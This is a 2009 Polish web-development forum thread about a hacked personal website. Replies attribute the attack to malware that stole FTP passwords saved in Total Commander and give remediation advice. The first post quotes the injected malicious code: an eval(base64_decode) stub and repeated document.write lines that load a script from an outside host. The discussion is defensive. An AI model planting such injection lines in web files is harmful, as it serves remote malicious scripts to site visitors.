Witaj Gościu! ( Zaloguj | Rejestruj )

Forum PHP.pl

 
Reply to this topicStart new topic
> włamanie na strone
john_doe
post
Post #1





Grupa: Zarejestrowani
Postów: 873
Pomógł: 25
Dołączył: 24.07.2005

Ostrzeżenie: (0%)
-----


Witam,

dziwna sprawa www.transgabar.pl

strona kolegi który sobie sam ją zrobił. Dzisiaj dzwoni do mnie, że coś nie śmiga.

Przejrzałem źródła strony i

1. w pliku index był wyciety początek pliku do rozpoczęcia znacznika <head>

gdzieś na dole w stylu display: none było coś takiego

eval(base64_decode('tutaj same krzaczki'));

2. tego flasha załączył dzięki swfObject.js

na końcu tego pliku było

  1. document.write('<script src=http://domusvalua.org/administrador/asociarse.php ><\/script>');
  2. document.write('<script src=http://domusvalua.org/administrador/asociarse.php ><\/script>');
  3. document.write('<script src=http://domusvalua.org/administrador/asociarse.php ><\/script>');
  4. document.write('<script src=http://domusvalua.org/administrador/asociarse.php ><\/script>');
  5. document.write('<script src=http://domusvalua.org/administrador/asociarse.php ><\/script>');
  6. document.write('<script src=http://domusvalua.org/administrador/asociarse.php ><\/script>');
  7. document.write('<script src=http://domusvalua.org/administrador/asociarse.php ><\/script>');
  8. document.write('<script src=http://domusvalua.org/administrador/asociarse.php ><\/script>');
  9. document.write('<script src=http://domusvalua.org/administrador/asociarse.php ><\/script>');
  10. document.write('<script src=http://domusvalua.org/administrador/asociarse.php ><\/script>');


jak ktoś takie coś zrobiłquestionmark.gif

jak można zmienić pliki bez włamania na konto i wyedytowania ich. Na tej stronie nie ma formularzy, bazy danych itp. Co to za atak?

Ten post edytował john_doe 23.10.2009, 10:26:54
Go to the top of the page
+Quote Post
nospor
post
Post #2





Grupa: Moderatorzy
Postów: 36 557
Pomógł: 6315
Dołączył: 27.12.2004




a czy twoj kolega uzywa totalcommandera? Pewnie wirus wykradl hasla z niego i sie zalogowal do niego na ftp i robil co chcial. Bardzo powszechny atak ostatnio. na forum czesto omawiany


--------------------

"Myśl, myśl, myśl..." - Kubuś Puchatek || "Manual, manual, manual..." - Kubuś Programista
"Szukaj, szukaj, szukaj..." - Kubuś Odkrywca || "Debuguj, debuguj, debuguj..." - Kubuś Developer

Go to the top of the page
+Quote Post
john_doe
post
Post #3





Grupa: Zarejestrowani
Postów: 873
Pomógł: 25
Dołączył: 24.07.2005

Ostrzeżenie: (0%)
-----


na bank używa totala. czego używać zamiast tego?
nospor dzięki. wiedziałem, że Ty od razu odpowiesz smile.gif
czyli mial jakiegos wirusa na kompie? gdyby np. jakiegos tam feralnego dnia logowal sie totalem z innego kompa nie doszło by do tego?
Go to the top of the page
+Quote Post
nospor
post
Post #4





Grupa: Moderatorzy
Postów: 36 557
Pomógł: 6315
Dołączył: 27.12.2004




niech zmieni hasla do ftp a nastepnie niech nie zapamietuje ich w totalu smile.gif


--------------------

"Myśl, myśl, myśl..." - Kubuś Puchatek || "Manual, manual, manual..." - Kubuś Programista
"Szukaj, szukaj, szukaj..." - Kubuś Odkrywca || "Debuguj, debuguj, debuguj..." - Kubuś Developer

Go to the top of the page
+Quote Post
thek
post
Post #5





Grupa: Moderatorzy
Postów: 4 362
Pomógł: 714
Dołączył: 12.02.2009
Skąd: Jak się położę tak leżę :D




Twórcy Totala obiecywali już jakiś czas temu, że błąd naprawią, gdyż obecnie hasła są przechowywane w sposób, który umożliwia ich prosty odczyt przez trojany, wirki czy co tam chcesz. Jak to stoi obecnie? Nie wiem czy wywiązali się z obietnicy bo już nie używam TC do ftp (Filezilla) i haseł też nigdzie nie zapamiętuję do plików ( dla bezpieczeństwa ) w programie. Zapamiętuję jedynie na czas sesji. Sam problem jest już jakoś od lutego znany bodajże albo i wcześniej (ja wtedy jakoś się z nim zetknąłem). Z tego co czytałem to dotyczył on także innych programów do łączenia z ftp, które miały niezabezpieczone pliki konfiguracyjne.
Pozostaje Ci zmienić hasła ( i nie zapamiętywać nigdzie ich ), usunąć wstawki do plików i koniecznie sprawdzić wszystkie katalogi serwera. Działa to bowiem tak, że kod jest dodawany do istniejących plików index.htm, html i czasem php. Jeśli takich nie znajdzie to tworzy na serwerze pliki index.html ze swoim kodem wewnątrz w każdym katalogu jaki przejrzy.


--------------------
Najpierw był manual... Jeśli tam nie zawarto słów mądrości to zapytaj wszechwiedzącego Google zadając mu własciwe pytania. A jeśli i on milczy to Twój problem nie istnieje :D
Go to the top of the page
+Quote Post
Daiquiri
post
Post #6





Grupa: Administratorzy
Postów: 1 552
Pomógł: 211
Dołączył: 7.07.2009
Skąd: NJ




Może winscp (na windowsa) lub CyberDuck(na maca)? Sama się w podobny i uroczy sposób zrobiłam w TotalCmd smile.gif Należę do osób częściowo leniwych więc hasła zapamiętuję, ale z brakiem np. jednej litery na końcu. Przy połączeniu wypluwa mi błąd związany z hasłem/loginem - a ja dopisuje tylko literkę na końcu smile.gif.
Go to the top of the page
+Quote Post
nmts
post
Post #7





Grupa: Zarejestrowani
Postów: 283
Pomógł: 34
Dołączył: 21.03.2008

Ostrzeżenie: (0%)
-----


Od dobrych kilku miesięcy w TC oprócz hasła do ftp podaje się dodatkowe hasło szyfrujące i wystarcza to na zwykłe wirusy iframe, bo wykradając hasła musiałyby poznać to dodatkowe , które jest potrzebne do połączenia. Więc jeśli nikt nie ma keyloggera to może chyba czuć się bezpiecznie?


--------------------
Free Web Tools - narzędzia dla programistów, webdeveloperów i specjalistów seo...
Go to the top of the page
+Quote Post
kilab
post
Post #8





Grupa: Zarejestrowani
Postów: 180
Pomógł: 19
Dołączył: 4.11.2007

Ostrzeżenie: (0%)
-----


To i ja dorzucę swoje 'pare groszy'. Przeniosłem się z TC po podobnych atakach na FileZill'e i nie zapamiętuję haseł. Od trzech miesięcy nie mam problemu z takimi akcjami  winksmiley.jpg


--------------------
Go to the top of the page
+Quote Post
l0ud
post
Post #9





Grupa: Zarejestrowani
Postów: 1 387
Pomógł: 273
Dołączył: 18.02.2008

Ostrzeżenie: (0%)
-----


Mimo wszystko zamiana programu to tylko obejście problemu (i to pewnie czasowe). W jakiś sposób te hasła wyciekły, czyli wirusy nadal działają.


--------------------
XMPP: l0ud@chrome.pl
Go to the top of the page
+Quote Post
nmts
post
Post #10





Grupa: Zarejestrowani
Postów: 283
Pomógł: 34
Dołączył: 21.03.2008

Ostrzeżenie: (0%)
-----


No przecież napisałem, że wystarczy szyfrować hasła i nikt się nie zaloguje bez klucza po wykradnięciu pliku, ale skoro nadal szukacie rozwiązania to Wasza sprawa. ^^


--------------------
Free Web Tools - narzędzia dla programistów, webdeveloperów i specjalistów seo...
Go to the top of the page
+Quote Post
vokiel
post
Post #11





Grupa: Zarejestrowani
Postów: 2 592
Pomógł: 445
Dołączył: 12.03.2007

Ostrzeżenie: (0%)
-----


Przede wszystkim to należy zabezpieczyć komputer antywirusem, firewallem. Co jakiś czas zrobić skanowanie systemu. Jeśli intruz się nie dostanie z zewnątrz, to sam z siebie się nie urodzi. Poza tym dobrą praktyką jest przenoszenie domyślnych konfiguracji. TC na to pozwala. To się tyczy nie tylko TC, ale innych programów, które nie szyfrują haseł.


--------------------
Go to the top of the page
+Quote Post

Reply to this topicStart new topic
1 Użytkowników czyta ten temat (1 Gości i 0 Anonimowych użytkowników)
0 Zarejestrowanych:

 



RSS Aktualny czas: 20.08.2025 - 09:01